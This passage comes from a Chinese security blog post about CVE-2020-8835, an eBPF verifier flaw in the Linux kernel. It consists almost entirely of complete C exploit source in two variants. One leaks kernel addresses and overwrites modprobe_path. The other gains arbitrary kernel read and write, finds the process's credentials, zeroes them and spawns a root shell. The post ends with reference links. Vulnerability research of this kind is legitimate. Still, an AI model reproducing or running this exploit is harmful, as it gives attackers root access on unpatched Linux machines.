    printf(": %-#16lxn",num);              
}                                           

static int bpf_prog_load(enum bpf_prog_type prog_type,         
        const struct bpf_insn *insns, int prog_len,  
        const char *license, int kern_version);      
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,  
        int max_entries);                                                 
static int bpf_update_elem(int fd ,void *key, void *value,uint64_t flags);
static int bpf_lookup_elem(int fd,void *key, void *value);
static void writemsg(void);
static void __exit(char *err);

struct bpf_insn insns[]={

    BPF_LD_MAP_FD(BPF_REG_1,3), //reg1=map[3]

    BPF_ALU64_IMM(BPF_MOV,6,0), //reg6 = 0
    BPF_STX_MEM(BPF_DW,10,6,-8),    //*(reg10-8)=reg6
    BPF_MOV64_REG(7,10),          //reg7 = reg10
    BPF_ALU64_IMM(BPF_ADD,7,-8),    //reg7 += -8
    BPF_MOV64_REG(2,7),             // reg2 = reg7
    BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,0,0,
            BPF_FUNC_map_lookup_elem),  //reg0=
    BPF_JMP_IMM(BPF_JNE,0,0,1), //if(reg0 != 0) exit
    BPF_EXIT_INSN(),
    // r9 = ctrlmap[0]
    BPF_MOV64_REG(9,0),     //reg9 =reg0
    //
    BPF_LDX_MEM(BPF_DW,6,9,0),  //reg6 = *reg9=ctrlmap[0]
    // offset


    /*// BPF_JGE 看 tnum  umin 1*/
    BPF_ALU64_IMM(BPF_MOV,0,0), //reg0 = 0

    BPF_JMP_IMM(BPF_JGE,6,1,1), //if(reg6 >= 1)(exit())
    BPF_EXIT_INSN(),    

    BPF_MOV64_IMM(8,0x1),   //reg8 = 1
    BPF_ALU64_IMM(BPF_LSH,8,32),    //(reg8)<<32
    BPF_ALU64_IMM(BPF_ADD,8,1),     //reg8 += 1
     /*BPF_JLE 看 tnum  umax 0x100000001*/
    BPF_JMP_REG(BPF_JLE,6,8,1),     // if(reg6 <= reg8)(jmp 1)
    BPF_EXIT_INSN(),


    /*//  JMP32  看 offset*/
    BPF_JMP32_IMM(BPF_JNE,6,5,1),   //if(reg6!=5)(jmp 1)
    BPF_EXIT_INSN(),

    BPF_ALU64_IMM(BPF_AND, 6, 2),   //reg6 & 2
    BPF_ALU64_IMM(BPF_RSH, 6, 1),   //reg6>>1

    //r6 == offset
    //r9 = inmap
    /*BPF_ALU64_REG(BPF_MUL, 6, 7),*/

    BPF_ALU64_IMM(BPF_MUL,6,0x110), //reg6 *= 0x110

    // outmap
    BPF_LD_MAP_FD(BPF_REG_1,4),     //reg1 = map[4]

    BPF_ALU64_IMM(BPF_MOV,8,0),     //reg8 = 0
    BPF_STX_MEM(BPF_DW,10,8,-8),    // fp[1] = -8

    BPF_MOV64_REG(7,10),            // reg7 = reg10
    BPF_ALU64_IMM(BPF_ADD,7,-8),    // reg7 += -8
    BPF_MOV64_REG(2,7),             // reg2 = reg7
    BPF_RAW_INSN(BPF_JMP|BPF_CALL,0,0,0,    
            BPF_FUNC_map_lookup_elem),  //
    BPF_JMP_IMM(BPF_JNE,0,0,1),     // if(reg0 != 1)(jmp 0)
    BPF_EXIT_INSN(),            

    BPF_MOV64_REG(7,0),             //reg7 = reg0

    BPF_ALU64_REG(BPF_SUB,7,6),     //reg7 -= reg6

    BPF_LDX_MEM(BPF_DW,8,7,0),      //reg8 = *reg7
    /*// inmap[2] == map_addr*/
    BPF_STX_MEM(BPF_DW,9,8,0x10),   //*reg9 = reg8+0x10
    BPF_MOV64_REG(2,8),             //reg2 = reg8

    BPF_LDX_MEM(BPF_DW,8,7,0xc0),   //reg8 = *(reg7+0xc0)
    BPF_STX_MEM(BPF_DW,9,8,0x18),   //*reg9 = (reg8+0x18)

    BPF_STX_MEM(BPF_DW,7,8,0x40),   //*reg7 = (reg8+0x40)
    BPF_ALU64_IMM(BPF_ADD,8,0x50),  //reg8 += 0x50


    BPF_LDX_MEM(BPF_DW,2,9,0x8),    //reg2 = *(reg9+0x8)
    BPF_JMP_IMM(BPF_JNE,2,1,4),     //if(reg2 != 4)(jmp 1)
    BPF_STX_MEM(BPF_DW,7,8,0), //ops    //*reg7 = reg8
    BPF_ST_MEM(BPF_W,7,0x18,BPF_MAP_TYPE_STACK),//map type
    BPF_ST_MEM(BPF_W,7,0x24,-1),// max_entries
    BPF_ST_MEM(BPF_W,7,0x2c,0x0), //lock_off


    BPF_ALU64_IMM(BPF_MOV,0,0),    //reg0 = 0
    BPF_EXIT_INSN(),
};

void  prep(){
    ctrlmapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,sizeof(int),0x100,0x1);	//ctrlmapfd
    if(ctrlmapfd<0){ __exit(strerror(errno));}
    expmapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,sizeof(int),0x2000,0x1);	//expmapfd
    if(expmapfd<0){ __exit(strerror(errno));}
    printf("ctrlmapfd: %d,  expmapfd: %d n",ctrlmapfd,expmapfd);


    progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
            insns, sizeof(insns), "GPL", 0);  							//
    if(progfd < 0){ __exit(strerror(errno));}

    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)){
        __exit(strerror(errno));
    }
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0){ 
        __exit(strerror(errno));
    }
}

void pwn(){
    printf("pwning...n");
    uint32_t key = 0x0;
    char *ctrlbuf = malloc(0x100);
    char *expbuf  = malloc(0x3000);

    uint64_t *ctrlbuf64 = (uint64_t *)ctrlbuf;
    uint64_t *expbuf64  = (uint64_t *)expbuf;

    memset(ctrlbuf,'A',0x100);
    for(int i=0;i<0x2000/8;i++){
        expbuf64[i] = i+1;
    }

    ctrlbuf64[0]=0x2;
    ctrlbuf64[1]=0x0;
    bpf_update_elem(ctrlmapfd,&key,ctrlbuf,0);		//ctrlmapfd[0]=ctrlbuf
    bpf_update_elem(expmapfd,&key,expbuf,0);			//expmapfd[0]=expbuf
    writemsg();
    // leak
    memset(ctrlbuf,0,0x100);
    bpf_lookup_elem(ctrlmapfd,&key,ctrlbuf);		//ctrlbuf=ctrlmapfd[0]
    x64dump(ctrlbuf,8);
    bpf_lookup_elem(expmapfd,&key,expbuf);			//expbuf=expmapfd[0]
    x64dump(expbuf,8);
    uint64_t map_leak = ctrlbuf64[2];						//
    uint64_t elem_leak = ctrlbuf64[3]-0xc0+0x110;
    uint64_t kaslr = map_leak - 0xffffffff82016340;
    uint64_t modprobe_path = 0xffffffff82446d80 + kaslr;
    loglx("map_leak",map_leak);
    loglx("elem_leak",elem_leak);
    loglx("kaslr",kaslr);
    loglx("modprobe",modprobe_path);

    uint64_t fake_map_ops[]={
        kaslr +0xffffffff8116ec70,
        kaslr +0xffffffff8116fa00,
        0x0,
        kaslr +0xffffffff8116f2d0,
        kaslr +0xffffffff8116ed50,//get net key 5
        0x0,
        0x0,
        kaslr +0xffffffff81159b30,
        0x0,
        kaslr +0xffffffff81159930,
        0x0,
        kaslr +0xffffffff8116edd0,
        kaslr +0xffffffff8116f1c0,
        kaslr +0xffffffff8116ed80,
        kaslr +0xffffffff8116ed50,//map_push_elem 15
        0x0,
        0x0,
        0x0,
        0x0,
        kaslr +0xffffffff8116f050,
        0x0,
        kaslr +0xffffffff8116ee80,
        kaslr +0xffffffff8116f870,
        0x0,
        0x0,
        0x0,
        kaslr +0xffffffff8116ece0,
        kaslr +0xffffffff8116ed10,
        kaslr +0xffffffff8116ee50,
    };

    // overwrite bpf_map_ops
    memcpy(expbuf,(void *)fake_map_ops,sizeof(fake_map_ops));
    bpf_update_elem(expmapfd,&key,expbuf,0);	//expmapfd[0]=expbuf


    //overwrite modeprobe path
    ctrlbuf64[0]=0x2;
    ctrlbuf64[1]=0x1;
    bpf_update_elem(ctrlmapfd,&key,ctrlbuf,0);
    writemsg();

    expbuf64[0] = 0x706d742f -1;
    bpf_update_elem(expmapfd,&key,expbuf,modprobe_path);
    expbuf64[0] = 0x6d68632f -1;
    bpf_update_elem(expmapfd,&key,expbuf,modprobe_path+4);
    expbuf64[0] = 0x646f -1;
    bpf_update_elem(expmapfd,&key,expbuf,modprobe_path+8);
}



int main(int argc,char **argv){
    init();
    prep();
    pwn();
    return 0;
}


static void __exit(char *err) {              
    fprintf(stderr, "error: %sn", err); 
    exit(-1);                            
}                                            
static void writemsg(void) {                                     
    char buffer[64];                                         
    ssize_t n = write(sockets[0], buffer, sizeof(buffer));   
}                                                                


static int bpf_prog_load(enum bpf_prog_type prog_type,         
        const struct bpf_insn *insns, int prog_len,  
        const char *license, int kern_version){

    union bpf_attr attr = {                                        
        .prog_type = prog_type,                                
        .insns = (uint64_t)insns,                              
        .insn_cnt = prog_len / sizeof(struct bpf_insn),        
        .license = (uint64_t)license,                          
        .log_buf = (uint64_t)bpf_log_buf,                      
        .log_size = LOG_BUF_SIZE,                              
        .log_level = 1,                                        
    };                                                             
    attr.kern_version = kern_version;                              
    bpf_log_buf[0] = 0;                                            
    return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));  

}
static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,  
        int max_entries){

    union bpf_attr attr = {                                         
        .map_type = map_type,                                   
        .key_size = key_size,                                   
        .value_size = value_size,                               
        .max_entries = max_entries                              
    };                                                              
    return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));  

}                                                
static int bpf_update_elem(int fd ,void *key, void *value,uint64_t flags){
    union bpf_attr attr = {                                              
        .map_fd = fd,                                                
        .key = (uint64_t)key,                                        
        .value = (uint64_t)value,                                    
        .flags = flags,                                              
    };                                                                   
    return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));  

}
static int bpf_lookup_elem(int fd,void *key, void *value){
    union bpf_attr attr = {                                              
        .map_fd = fd,                                                
        .key = (uint64_t)key,                                        
        .value = (uint64_t)value,                                    
    };                                                                   
    return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));  
}

#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>
#include <sys/prctl.h>
#include "./bpf.h"

#define BPF_JMP32 0x06
#define BPF_JLT 0xa0
#define BPF_OBJ_GET_INFO_BY_FD 15
#define BPF_MAP_TYPE_STACK 0x17

#define BPF_ALU64_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_K,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })
#define BPF_ALU64_REG(OP, DST, SRC)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_OP(OP) | BPF_X,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })
#define BPF_ALU32_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_OP(OP) | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })
#define BPF_ALU32_REG(OP, DST, SRC)				\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_OP(OP) | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MOV64_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MOV32_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MOV64_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU64 | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_MOV32_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code  = BPF_ALU | BPF_MOV | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = IMM })

#define BPF_LD_IMM64(DST, IMM)					\
	BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_IMM64_RAW(DST, SRC, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_LD | BPF_DW | BPF_IMM,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = 0,					\
		.imm   = (__u32) (IMM) }),			\
	((struct bpf_insn) {					\
		.code  = 0, 					\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = ((__u64) (IMM)) >> 32 })

#ifndef BPF_PSEUDO_MAP_FD
# define BPF_PSEUDO_MAP_FD	1
#endif

#define BPF_LD_IMM64(DST, IMM)					\
	BPF_LD_IMM64_RAW(DST, 0, IMM)

#define BPF_LD_MAP_FD(DST, MAP_FD)				\
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_ST_MEM(SIZE, DST, OFF, IMM)				\
	((struct bpf_insn) {					\
		.code  = BPF_ST | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

/* Unconditional jumps, goto pc + off16 */

#define BPF_JMP_A(OFF)						\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_JA,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_JMP32_REG(OP, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_JMP32 | BPF_OP(OP) | BPF_X,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

/* Like BPF_JMP_IMM, but with 32-bit wide operands for comparison. */

#define BPF_JMP32_IMM(OP, DST, IMM, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_JMP32 | BPF_OP(OP) | BPF_K,	\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

#define BPF_JMP_REG(OP, DST, SRC, OFF)				\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_OP(OP) | BPF_X,		\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

#define BPF_JMP_IMM(OP, DST, IMM, OFF)				\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_OP(OP) | BPF_K,		\
		.dst_reg = DST,					\
		.src_reg = 0,					\
		.off   = OFF,					\
		.imm   = IMM })

#define BPF_RAW_INSN(CODE, DST, SRC, OFF, IMM)			\
	((struct bpf_insn) {					\
		.code  = CODE,					\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = IMM })

#define BPF_EXIT_INSN()						\
	((struct bpf_insn) {					\
		.code  = BPF_JMP | BPF_EXIT,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off   = 0,					\
		.imm   = 0 })

#define BPF_MAP_GET(idx, dst)                                                        \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
	BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
	BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0)          /* r_dst = *(u64 *)(r0)   */              

#define BPF_MAP_GET_ADDR(idx, dst)                                                        \
	BPF_MOV64_REG(BPF_REG_1, BPF_REG_9),              /* r1 = r9                */   \
	BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),             /* r2 = fp                */   \
	BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),            /* r2 = fp - 4            */   \
	BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx),           /* *(u32 *)(fp - 4) = idx */   \
	BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),             \
	BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),            /* if (r0 == 0)           */   \
	BPF_EXIT_INSN(),                                  /*   exit(0);             */   \
	BPF_MOV64_REG((dst), BPF_REG_0)          	  /* r_dst = (r0)   */              

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */

#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */

#define BPF_STX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code  = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = DST,					\
		.src_reg = SRC,					\
		.off   = OFF,					\
		.imm   = 0 })


char buffer[64];
int sockets[2];
int progfd;
int ctrl_mapfd, exp_mapfd;
int doredact = 0;

#define LOG_BUF_SIZE 0x100000
char bpf_log_buf[LOG_BUF_SIZE];

uint64_t ctrl_buf[0x100]; 
uint64_t exp_buf[0x3000]; 
char info[0x100];
#define RADIX_TREE_INTERNAL_NODE 2
#define RADIX_TREE_MAP_MASK 0x3f

static __u64 ptr_to_u64(void *ptr)
{
	return (__u64) (unsigned long) ptr;
}

int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version)
{
	union bpf_attr attr = {
		.prog_type = prog_type,
		.insns = ptr_to_u64((void *) insns),
		.insn_cnt = prog_len / sizeof(struct bpf_insn),
		.license = ptr_to_u64((void *) license),
		.log_buf = ptr_to_u64(bpf_log_buf),
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	attr.kern_version = kern_version;

	bpf_log_buf[0] = 0;

	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries, int map_flags)
{
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries
	};

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, void *value, int mapfd, uint64_t flags) 
{
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)&key,
		.value = (__u64)value,
		.flags = flags,
	};

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value, int mapfd) 
{
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)key,
		.value = (__u64)value,
	};

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static uint32_t bpf_map_get_info_by_fd(uint64_t key, void *value, int mapfd, void *info) 
{
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)&key,
		.value = (__u64)value,
        .info.bpf_fd = mapfd,
        .info.info_len = 0x100,
        .info.info = (__u64)info,
	};

	syscall(__NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr));

    return *(uint32_t *)((char *)info+0x40);
}


static void __exit(char *err) 
{
	fprintf(stderr, "error: %s\n", err);
	exit(-1);
}


static int load_my_prog()
{
	struct bpf_insn my_prog[] = {

		BPF_LD_MAP_FD(BPF_REG_9,ctrl_mapfd),
		BPF_MAP_GET(0,BPF_REG_8), //1	
	    BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),          	  /* r_dst = (r0)   */              

		BPF_LD_IMM64(BPF_REG_2,0x4000000000),			
		BPF_LD_IMM64(BPF_REG_3,0x2000000000),			
		BPF_LD_IMM64(BPF_REG_4,0xFFFFffff),			
		BPF_LD_IMM64(BPF_REG_5,0x1),			
		
		BPF_JMP_REG(BPF_JGT,BPF_REG_8,BPF_REG_2,5), 
		BPF_JMP_REG(BPF_JLT,BPF_REG_8,BPF_REG_3,4),
		BPF_JMP32_REG(BPF_JGT,BPF_REG_8,BPF_REG_4,3),
		BPF_JMP32_REG(BPF_JLT,BPF_REG_8,BPF_REG_5,2),	
		
		BPF_ALU64_REG(BPF_AND,BPF_REG_8,BPF_REG_4),	
		BPF_JMP_IMM(BPF_JA, 0, 0, 2),
		
		BPF_MOV64_IMM(BPF_REG_0,0x0),			
		BPF_EXIT_INSN(),
        
        //-------- exp_mapfd
		BPF_LD_MAP_FD(BPF_REG_9,exp_mapfd),
		BPF_MAP_GET_ADDR(0,BPF_REG_7), //2	
		BPF_ALU64_REG(BPF_SUB,BPF_REG_7,BPF_REG_8),	
        
        BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0),    
        BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x10), 

        BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0xc0), 
        BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x18),

		BPF_ALU64_IMM(BPF_ADD,BPF_REG_0,0x50), 
       
        // &ctrl[0]+0x8 -> op 1:read 2:write
        BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_6,0x8),  // r8 = op
	    BPF_JMP_IMM(BPF_JNE, BPF_REG_8, 1, 4),    //3       

        // arbitrary read
        BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_6,0x20),  // r8 = op
        BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_0,0x40),

		BPF_MOV64_IMM(BPF_REG_0,0x0),			
		BPF_EXIT_INSN(),

	    BPF_JMP_IMM(BPF_JNE, BPF_REG_8, 2, 4),    //3       
        
        // arbitrary write
        BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_0,0), 
        BPF_ST_MEM(BPF_W,BPF_REG_7,0x18,BPF_MAP_TYPE_STACK),//map type
        BPF_ST_MEM(BPF_W,BPF_REG_7,0x24,-1),// max_entries
        BPF_ST_MEM(BPF_W,BPF_REG_7,0x2c,0x0), //lock_off

		BPF_MOV64_IMM(BPF_REG_0,0x0),			
		BPF_EXIT_INSN(),

	};
	return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,my_prog,sizeof(my_prog),"GPL",0);
}

static void prep(void) 
{
	ctrl_mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,sizeof(int),0x100,1,0);
	if(ctrl_mapfd < 0){
		__exit(strerror(errno));
	}

    exp_mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,sizeof(int),0x2000,1,0);
	if(ctrl_mapfd < 0){
		__exit(strerror(errno));
	}

    printf("ctrl_mapfd:%d, exp_mapfd:%d\n", ctrl_mapfd, exp_mapfd);

	progfd =  load_my_prog();
	if(progfd < 0){
		printf("%s\n",bpf_log_buf);
		__exit(strerror(errno));
	}
	//printf("%s\n",bpf_log_buf);
	
	if(socketpair(AF_UNIX,SOCK_DGRAM,0,sockets)){
		__exit(strerror(errno));
	}
	
	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0){
		__exit(strerror(errno));
	}
}


static void writemsg(void) 
{
	char buffer[64];

	ssize_t n = write(sockets[0], buffer, sizeof(buffer));

	if (n < 0) {
		perror("write");
		return;
	}
	if (n != sizeof(buffer))
		fprintf(stderr, "short write: %lu\n", n);
}

static void update_elem(uint32_t op)
{
    ctrl_buf[0] = 0x2000000000+0x110;
    ctrl_buf[1] = op;

	bpf_update_elem(0, ctrl_buf, ctrl_mapfd, 0);
    bpf_update_elem(0, exp_buf, exp_mapfd, 0);
    writemsg();
}

static uint64_t infoleak(uint64_t *buffer, int mapfd) 
{
	uint64_t key = 0;
    if (bpf_lookup_elem(&key, buffer, mapfd))
		__exit(strerror(errno));
}


static uint32_t arbitrary_read(uint64_t addr){
        uint32_t read_info;

        ctrl_buf[0] = 0x2000000000+0x110;
        ctrl_buf[1] = 1;
        ctrl_buf[4] = addr - 0x58;

	    bpf_update_elem(0, ctrl_buf, ctrl_mapfd, 0);
        bpf_update_elem(0, exp_buf, exp_mapfd, 0);
        writemsg();

        read_info =  bpf_map_get_info_by_fd(0, exp_buf, exp_mapfd, info);
        return read_info;
}


static uint64_t read_8byte(uint64_t addr){

    uint32_t addr_low = arbitrary_read(addr);
    uint32_t addr_high = arbitrary_read(addr + 0x4);
    return ((uint64_t)addr_high << 32) | addr_low;
}

static void hextostr(uint64_t hex){
    char str[8];
    for(int i = 0; i < 8; i++){
        str[i] = hex & 0xff;
        hex = hex >> 8;
    }
    printf("com: %s\n", str);
}

static void pwn(void)
{
	
	uint64_t leak_addr, kernel_base;
    uint32_t read_low, read_high;

    //----------------leak info----------------------- 
    //

    update_elem(0);

    infoleak(ctrl_buf, ctrl_mapfd);

    uint64_t map_leak = ctrl_buf[2];
    printf("[+] leak array_map_ops:0x%lX\n", map_leak);
    kernel_base = map_leak - 0x1016480;
    printf("[+] leak kernel_base addr:0x%lX\n", kernel_base);

    uint64_t elem_leak = ctrl_buf[3] - 0xc0 +0x110;
    printf("[+] leak exp_map_elem addr:0x%lX\n", elem_leak);

    // ---------------------------arbitrary read --------------------
    //

    
    uint64_t task_struct, cred, current_task, comm;
    uint64_t per_cpu_offset = read_8byte(0xffffffff822c26c0);
    printf("per_cpu_offset: 0x%lx\n", per_cpu_offset);
    for(int i = 0; ; i++){
        current_task = read_8byte(per_cpu_offset + 0x17d00);
        comm = read_8byte(current_task + 0x648);
        if(comm == 0x676e69735f707865){ // exp_single_core  "exp_sing"=0x676e69735f707865       "current"=0x746e6572727563
            printf("current_task: 0x%lx\n", current_task);
            task_struct = current_task;
            printf("[+] comm: 0x%lx\n", comm); // get comm to check
            hextostr(comm);
            break;
        }
    }

    cred = read_8byte(task_struct + 0x638);// get cred addr 
    printf("[+] cred: 0x%lx\n", cred);

    //----------------------------arbitrary write----------------------
    //
    uint64_t fake_map_ops[] = {
        kernel_base + 0x16ceb0,
        kernel_base + 0x16dd70,
        0,
        kernel_base + 0x16d650,
        kernel_base + 0x16cfa0,//get net key 5
        0x0,
        0x0,
        kernel_base + 0x16d020,
        kernel_base + 0x16d540,
        kernel_base + 0x16cfd0,
        kernel_base + 0x16cfa0,//map_push_elem 15
        0x0,
        0x0,
        0x0,
        0x0,
        kernel_base + 0x16d2a0,
        0x0,
        kernel_base + 0x16d0d0,
        kernel_base + 0x16dbe0,
        0x0,
        0x0,
        0x0,
        kernel_base + 0x16cf30,
        kernel_base + 0x16cf60,
        kernel_base + 0x16d0a0,
    };
    memcpy(exp_buf, fake_map_ops, sizeof(fake_map_ops));

    update_elem(2);
    
    exp_buf[0] = 0x0-1;
    for(int i = 0; i < 8; i++){
        bpf_update_elem(0, exp_buf, exp_mapfd, cred+4+i*4);
    }
}

void get_shell(){

    if(!getuid())
    {
        printf("[+] you got root!\n");
        system("/bin/sh");
    }
    else
    {
        printf("[T.T] privilege escalation failed !!!\n");
    }
    exit(0);

}

int main(void){

	prep();
	pwn();
    get_shell();
	return 0;
}

参考

CVE-2020-8835 pwn2own 2020 ebpf 提权漏洞分析

[kernel exploit]CVE-2020-8835：eBPF verifier 错误处理导致越界读写

eBPF & CVE-2020-8835

赏

只要你支持她，我们就是好朋友2333

支付宝

微信

• 本文作者： A1ex
• 本文链接： http://yoursite.com/2021/05/01/CVE-2020-8835-eBPF提权漏洞分析/
• 版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！